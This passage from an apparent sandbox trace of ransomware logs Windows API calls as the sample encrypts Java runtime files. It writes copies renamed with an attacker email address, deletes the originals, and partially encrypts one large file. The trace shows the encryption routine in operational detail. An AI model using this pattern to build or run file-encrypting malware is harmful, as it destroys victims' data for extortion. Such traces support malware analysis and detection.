(lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_common.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\prism_common.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0152.603] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac2eb0) returned 1 [0152.604] CryptSetKeyParam (hKey=0xac2eb0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0152.604] ReadFile (in: hFile=0x2f8, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0xe040, lpOverlapped=0x0) returned 1 [0152.608] CryptEncrypt (in: hKey=0xac2eb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0xe050, dwBufLen=0xe050 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0xe050) returned 1 [0152.608] WriteFile (in: hFile=0x2dc, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xe050, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xe050, lpOverlapped=0x0) returned 1 [0152.609] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac3170) returned 1 [0152.609] CryptSetKeyParam (hKey=0xac3170, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0152.609] CryptEncrypt (in: hKey=0xac3170, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x50, dwBufLen=0x50 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x50) returned 1 [0152.609] CryptDestroyKey (hKey=0xac3170) returned 1 [0152.609] WriteFile (in: hFile=0x2dc, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x102, lpOverlapped=0x0) returned 1 [0152.609] CryptDestroyKey (hKey=0xac2eb0) returned 1 [0152.610] CloseHandle (hObject=0x2f8) returned 1 [0152.610] CloseHandle (hObject=0x2dc) returned 1 [0152.610] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_common.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\prism_common.dll")) returned 1 [0152.611] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0152.611] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_d3d.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\prism_d3d.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0152.612] GetFileSizeEx (in: hFile=0x2dc, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=130624) returned 1 [0152.612] CloseHandle (hObject=0x2dc) returned 1 [0152.612] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_d3d.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\prism_d3d.dll")) returned 0x20 [0152.612] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_d3d.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\prism_d3d.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0152.612] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_d3d.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\prism_d3d.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0152.613] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0152.613] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0152.613] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_d3d.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\prism_d3d.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0152.613] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac3230) returned 1 [0152.613] CryptSetKeyParam (hKey=0xac3230, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0152.613] ReadFile (in: hFile=0x2dc, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x1fe40, lpOverlapped=0x0) returned 1 [0152.617] CryptEncrypt (in: hKey=0xac3230, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x1fe50, dwBufLen=0x1fe50 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x1fe50) returned 1 [0152.617] WriteFile (in: hFile=0x2f8, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x1fe50, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x1fe50, lpOverlapped=0x0) returned 1 [0152.620] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac2e70) returned 1 [0152.620] CryptSetKeyParam (hKey=0xac2e70, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0152.620] CryptEncrypt (in: hKey=0xac2e70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40, dwBufLen=0x40 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40) returned 1 [0152.620] CryptDestroyKey (hKey=0xac2e70) returned 1 [0152.620] WriteFile (in: hFile=0x2f8, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xf2, lpOverlapped=0x0) returned 1 [0152.620] CryptDestroyKey (hKey=0xac3230) returned 1 [0152.620] CloseHandle (hObject=0x2dc) returned 1 [0152.620] CloseHandle (hObject=0x2f8) returned 1 [0152.620] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_d3d.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\prism_d3d.dll")) returned 1 [0152.622] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0152.622] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_sw.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\prism_sw.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0152.622] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=97856) returned 1 [0152.622] CloseHandle (hObject=0x2f8) returned 1 [0152.622] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_sw.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\prism_sw.dll")) returned 0x20 [0152.622] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_sw.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\prism_sw.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0152.622] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_sw.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\prism_sw.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0152.623] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0152.623] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0152.623] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_sw.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\prism_sw.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0152.623] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac33f0) returned 1 [0152.623] CryptSetKeyParam (hKey=0xac33f0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0152.623] ReadFile (in: hFile=0x2f8, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x17e40, lpOverlapped=0x0) returned 1 [0152.755] CryptEncrypt (in: hKey=0xac33f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x17e50, dwBufLen=0x17e50 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x17e50) returned 1 [0152.755] WriteFile (in: hFile=0x2dc, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x17e50, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x17e50, lpOverlapped=0x0) returned 1 [0152.757] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac2f30) returned 1 [0152.757] CryptSetKeyParam (hKey=0xac2f30, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0152.757] CryptEncrypt (in: hKey=0xac2f30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40, dwBufLen=0x40 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40) returned 1 [0152.757] CryptDestroyKey (hKey=0xac2f30) returned 1 [0152.758] WriteFile (in: hFile=0x2dc, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xf2, lpOverlapped=0x0) returned 1 [0152.758] CryptDestroyKey (hKey=0xac33f0) returned 1 [0152.758] CloseHandle (hObject=0x2f8) returned 1 [0152.758] CloseHandle (hObject=0x2dc) returned 1 [0152.758] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\prism_sw.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\prism_sw.dll")) returned 1 [0152.759] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0152.760] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmid.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\rmid.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0152.760] GetFileSizeEx (in: hFile=0x2dc, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=15936) returned 1 [0152.760] CloseHandle (hObject=0x2dc) returned 1 [0152.760] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmid.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\rmid.exe")) returned 0x20 [0152.760] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmid.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\rmid.exe.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0152.760] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmid.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\rmid.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0152.760] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0152.760] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0152.760] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmid.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\rmid.exe.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0152.760] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac32b0) returned 1 [0152.761] CryptSetKeyParam (hKey=0xac32b0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0152.761] ReadFile (in: hFile=0x2dc, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x3e40, lpOverlapped=0x0) returned 1 [0152.762] CryptEncrypt (in: hKey=0xac32b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x3e50, dwBufLen=0x3e50 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x3e50) returned 1 [0152.762] WriteFile (in: hFile=0x2f8, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x3e50, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x3e50, lpOverlapped=0x0) returned 1 [0152.764] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac2fb0) returned 1 [0152.764] CryptSetKeyParam (hKey=0xac2fb0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0152.764] CryptEncrypt (in: hKey=0xac2fb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40, dwBufLen=0x40 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40) returned 1 [0152.764] CryptDestroyKey (hKey=0xac2fb0) returned 1 [0152.764] WriteFile (in: hFile=0x2f8, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xf2, lpOverlapped=0x0) returned 1 [0152.764] CryptDestroyKey (hKey=0xac32b0) returned 1 [0152.764] CloseHandle (hObject=0x2dc) returned 1 [0152.764] CloseHandle (hObject=0x2f8) returned 1 [0152.764] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmid.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\rmid.exe")) returned 1 [0152.765] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0152.765] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmiregistry.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\rmiregistry.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0152.766] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=16448) returned 1 [0152.766] CloseHandle (hObject=0x2f8) returned 1 [0152.766] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmiregistry.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\rmiregistry.exe")) returned 0x20 [0152.766] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmiregistry.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\rmiregistry.exe.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0152.766] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmiregistry.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\rmiregistry.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0152.766] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0152.766] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0152.766] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmiregistry.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\rmiregistry.exe.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0152.767] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac2df0) returned 1 [0152.767] CryptSetKeyParam (hKey=0xac2df0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0152.767] ReadFile (in: hFile=0x2f8, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x4040, lpOverlapped=0x0) returned 1 [0152.768] CryptEncrypt (in: hKey=0xac2df0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x4050, dwBufLen=0x4050 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x4050) returned 1 [0152.768] WriteFile (in: hFile=0x2dc, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x4050, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x4050, lpOverlapped=0x0) returned 1 [0152.772] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac34b0) returned 1 [0152.772] CryptSetKeyParam (hKey=0xac34b0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0152.772] CryptEncrypt (in: hKey=0xac34b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40, dwBufLen=0x40 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40) returned 1 [0152.772] CryptDestroyKey (hKey=0xac34b0) returned 1 [0152.772] WriteFile (in: hFile=0x2dc, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xf2, lpOverlapped=0x0) returned 1 [0152.772] CryptDestroyKey (hKey=0xac2df0) returned 1 [0152.772] CloseHandle (hObject=0x2f8) returned 1 [0152.772] CloseHandle (hObject=0x2dc) returned 1 [0152.772] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\rmiregistry.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\rmiregistry.exe")) returned 1 [0152.773] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0152.773] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\classes.jsa"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0152.774] GetFileSizeEx (in: hFile=0x2dc, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=18677760) returned 1 [0152.774] CloseHandle (hObject=0x2dc) returned 1 [0152.774] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\classes.jsa")) returned 0x21 [0152.774] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa", dwFileAttributes=0x20) returned 1 [0152.774] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\classes.jsa"), lpNewFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\classes.jsa.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 1 [0152.775] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\classes.jsa.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0152.775] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6c0 | out: lpNewFilePointer=0x0) returned 1 [0152.775] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6c0 | out: lpNewFilePointer=0x0) returned 1 [0152.776] ReadFile (in: hFile=0x2dc, lpBuffer=0x3791058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x33ef6cc, lpOverlapped=0x0 | out: lpBuffer=0x3791058*, lpNumberOfBytesRead=0x33ef6cc*=0x40000, lpOverlapped=0x0) returned 1 [0152.786] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x5f0000, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6c0 | out: lpNewFilePointer=0x0) returned 1 [0152.786] ReadFile (in: hFile=0x2dc, lpBuffer=0x37d1058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x33ef6cc, lpOverlapped=0x0 | out: lpBuffer=0x37d1058*, lpNumberOfBytesRead=0x33ef6cc*=0x40000, lpOverlapped=0x0) returned 1 [0152.797] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x1190000, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6c0 | out: lpNewFilePointer=0x0) returned 1 [0152.797] ReadFile (in: hFile=0x2dc, lpBuffer=0x3811058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x33ef6cc, lpOverlapped=0x0 | out: lpBuffer=0x3811058*, lpNumberOfBytesRead=0x33ef6cc*=0x40000, lpOverlapped=0x0) returned 1 [0152.921] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6b0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef71c | out: phKey=0x33ef71c*=0xac34b0) returned 1 [0152.921] CryptSetKeyParam (hKey=0xac34b0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0152.922] CryptEncrypt (in: hKey=0xac34b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6d0*=0xc0050, dwBufLen=0xc0050 | out: pbData=0x3791020*, pdwDataLen=0x33ef6d0*=0xc0050) returned 1 [0152.923] CryptDestroyKey (hKey=0xac34b0) returned 1 [0152.923] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f8 | out: lpNewFilePointer=0x0) returned 1 [0152.923] WriteFile (in: hFile=0x2dc, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x33ef708, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef708*=0xc0102, lpOverlapped=0x0) returned 1 [0152.939] SetEndOfFile (hFile=0x2dc) returned 1 [0152.939] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x1190000, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6c8 | out: lpNewFilePointer=0x0) returned 1 [0152.939] WriteFile (in: hFile=0x2dc, lpBuffer=0x385113a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x33ef6d4, lpOverlapped=0x0 | out: lpBuffer=0x385113a*, lpNumberOfBytesWritten=0x33ef6d4*=0x40000, lpOverlapped=0x0) returned 1 [0152.942] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x5f0000, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6c8 | out: lpNewFilePointer=0x0) returned 1 [0152.942] WriteFile (in: hFile=0x2dc, lpBuffer=0x385113a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x33ef6d4, 